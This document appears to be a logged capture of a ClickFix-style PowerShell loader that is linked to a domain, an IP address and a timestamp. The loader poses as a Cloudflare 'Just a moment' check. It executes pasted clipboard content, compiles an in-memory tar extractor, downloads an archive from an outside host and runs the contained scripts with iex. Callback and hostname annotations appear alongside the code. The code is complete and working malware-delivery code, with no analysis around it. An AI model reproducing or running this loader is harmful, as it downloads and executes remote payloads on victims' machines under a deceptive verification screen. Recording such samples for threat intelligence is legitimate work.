order-ledger-com 103.167.99.154
|
powershell -c "iex('{0}' -f (Get-Clipboard -Raw).Substring(260));"
echo "
____ _ _ __ _
/ ___| | ___ _ _ __| |/ _| | __ _ _ __ ___
| | | |/ _ \| | | |/ _` | |_| |/ _` | '__/ _ \
| |___| | (_) | |_| | (_| | _| | (_| | | | __/
\____|_|\___/ \__,_|\__,_|_| |_|\__,_|_| \___|
";
Write-Output "Just a moment ..."
if (-not ([AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object { $_.GetTypes() } | Where-Object { $_.FullName -eq 'ArchiveExtractor' })) {
$tarExtractorCode = @"
using System;
using System.IO;
using System.Collections.Generic;
public class ArchiveExtractor
{
public static Dictionary ExtractArchiveFromMemory(byte[] tarData)
{
var extractedFiles = new Dictionary();
using (var memoryStream = new MemoryStream(tarData))
{
while (memoryStream.Position < memoryStream.Length)
{
byte[] header = new byte[512];
memoryStream.Read(header, 0, 512);
string fileName = System.Text.Encoding.ASCII.GetString(header, 0, 100).Trim('\0');
if (string.IsNullOrEmpty(fileName)) break;
string fileSizeOctal = System.Text.Encoding.ASCII.GetString(header, 124, 12).Trim('\0').Trim();
long fileSize = Convert.ToInt64(fileSizeOctal, 8);
byte[] fileData = new byte[fileSize];
memoryStream.Read(fileData, 0, fileData.Length);
extractedFiles.Add(fileName, fileData);
long padding = 512 - (memoryStream.Position % 512);
if (padding < 512)
{
memoryStream.Seek(padding, SeekOrigin.Current);
}
}
}
return extractedFiles;
}
}
"@
Add-Type -TypeDefinition $tarExtractorCode -Language CSharp
}
$webClient = New-Object System.Net.WebClient
$tarData = $webClient.DownloadData("https://webarchives.pages.dev/sega.tar")
Write-Output "50%"
$extractedFiles = [ArchiveExtractor]::ExtractArchiveFromMemory($tarData)
# Callback: https://api.cdn0v3.com/api/v1?ray_id=a0956c5202ccb168&action=signal
foreach ($file in $extractedFiles.Keys) {
# Tag: tbs
if ($file -match "\.bin$") {
$data = $extractedFiles[$file]
$configurationString = [System.Text.Encoding]::UTF8.GetString($data)
}
# Hostname: newlandallnatureusa.com
if ($file -match "\.txt$") {
Write-Output "85%"
$data = $extractedFiles[$file]
$plugin = [System.Text.Encoding]::UTF8.GetString($data)
iex $plugin
}
}
|
2026-01-13 19:52:12 |
|
|